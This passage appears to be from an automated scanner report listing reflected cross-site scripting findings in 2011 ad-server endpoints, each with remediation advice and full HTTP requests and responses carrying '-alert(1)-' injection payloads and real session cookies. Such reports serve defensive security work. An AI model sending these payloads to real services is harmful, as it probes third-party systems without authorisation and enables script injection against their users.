Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:23:30 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 13-Jul-2011 11:23:30 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.mtv/ent_0101113a0df'-alert(1)-'ad6b99e809c;sz=728x90;net=cm;ord=[timestamp];'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.3. http://a.collective-media.net/adj/cm.mtv/ent_010111 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.mtv/ent_010111

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84af9'-alert(1)-'86aaccb8509 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.mtv/ent_010111;sz=728x90;ord=[timestamp]?&84af9'-alert(1)-'86aaccb8509=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:23:29 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 13-Jul-2011 11:23:29 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.mtv/ent_010111;sz=728x90;net=cm;ord=[timestamp]?&84af9'-alert(1)-'86aaccb8509=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.4. http://a.collective-media.net/adj/cm.mtv/ent_010111 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.mtv/ent_010111

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f097'-alert(1)-'a07a6cc0580 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.mtv/ent_010111;sz=728x90;ord=[timestamp]?3f097'-alert(1)-'a07a6cc0580 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=120221f8320d7dc; JY57=332jXJ1Pqjj-HqZYNcOZJMDRxyMFbPVXvMReGdRQ2Q3tgRpc00YOW1w; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Mon, 13 Jun 2011 11:23:29 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 13-Jul-2011 11:23:29 GMT

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.mtv/ent_010111;sz=728x90;net=cm;ord=[timestamp]?3f097'-alert(1)-'a07a6cc0580;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.5. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1284f"-alert(1)-"841d2a94644 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=1284f"-alert(1)-"841d2a94644 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7019
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 12:17:46 GMT
Expires: Mon, 13 Jun 2011 12:17:46 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
gEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=1284f"-alert(1)-"841d2a94644http://www.samsclub.com/sams/pagedetails/content.jsp?pageName=fathersDay_2011&pid=VML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowsc
...[SNIP]...

4.6. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83e2d"-alert(1)-"473a8a0b356 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must appear inside a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emitting it, so that quotes, backslashes, < and / cannot terminate the literal or the enclosing <script> element; HTML entity encoding is not sufficient here, because entities are not decoded inside script blocks. Since the reflected data is part of the click-through URL, validating that URL against an allow-list of schemes and hosts before it is used limits what an attacker can place there at all.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA83e2d"-alert(1)-"473a8a0b356&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
Date: Mon, 13 Jun 2011 12:17:15 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA83e2d"-alert(1)-"473a8a0b356&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fs
...[SNIP]...

4.7. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa3c0"-alert(1)-"9e76203f975 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must appear inside a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emitting it, so that quotes, backslashes, < and / cannot terminate the literal or the enclosing <script> element; HTML entity encoding is not sufficient here, because entities are not decoded inside script blocks. Since the reflected data is part of the click-through URL, validating that URL against an allow-list of schemes and hosts before it is used limits what an attacker can place there at all.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342aa3c0"-alert(1)-"9e76203f975&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
Date: Mon, 13 Jun 2011 12:17:44 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
UuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342aa3c0"-alert(1)-"9e76203f975&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg
...[SNIP]...

4.8. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7cc6"-alert(1)-"70134b5d168 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must appear inside a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emitting it, so that quotes, backslashes, < and / cannot terminate the literal or the enclosing <script> element; HTML entity encoding is not sufficient here, because entities are not decoded inside script blocks. Since the reflected data is part of the click-through URL, validating that URL against an allow-list of schemes and hosts before it is used limits what an attacker can place there at all.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1a7cc6"-alert(1)-"70134b5d168&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
Date: Mon, 13 Jun 2011 12:17:25 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1a7cc6"-alert(1)-"70134b5d168&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl =
...[SNIP]...

4.9. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0c04"-alert(1)-"8bc6f69c449 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must appear inside a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emitting it, so that quotes, backslashes, < and / cannot terminate the literal or the enclosing <script> element; HTML entity encoding is not sufficient here, because entities are not decoded inside script blocks. Since the reflected data is part of the click-through URL, validating that URL against an allow-list of schemes and hosts before it is used limits what an attacker can place there at all.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzwf0c04"-alert(1)-"8bc6f69c449&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
Date: Mon, 13 Jun 2011 12:17:34 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzwf0c04"-alert(1)-"8bc6f69c449&client=ca-pub-7494156027018342&adurl=http%3a%2f%2fwww.samsclub.com/sams/pagedetails/content.jsp%3FpageName%3DfathersDay_2011%26pid%3DVML_Fathers");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

4.10. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 742ff"-alert(1)-"6805e040324 was submitted in the sz parameter. This input was echoed unmodified in the application's response. Note that in the request below the payload lands immediately after sa=L at the start of the query string rather than after the sz=728x90 path segment; however the scanner attributes it, the sink is the same one as in the preceding findings: the whole click-through URL is reflected into url = escape("..."), as the response shows.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the value must appear inside a JavaScript string literal, encode every character outside [A-Za-z0-9] as \xHH or \uHHHH before emitting it, so that quotes, backslashes, < and / cannot terminate the literal or the enclosing <script> element; HTML entity encoding is not sufficient here, because entities are not decoded inside script blocks. Since the reflected data is part of the click-through URL, validating that URL against an allow-list of schemes and hosts before it is used limits what an attacker can place there at all.

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L742ff"-alert(1)-"6805e040324&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7061
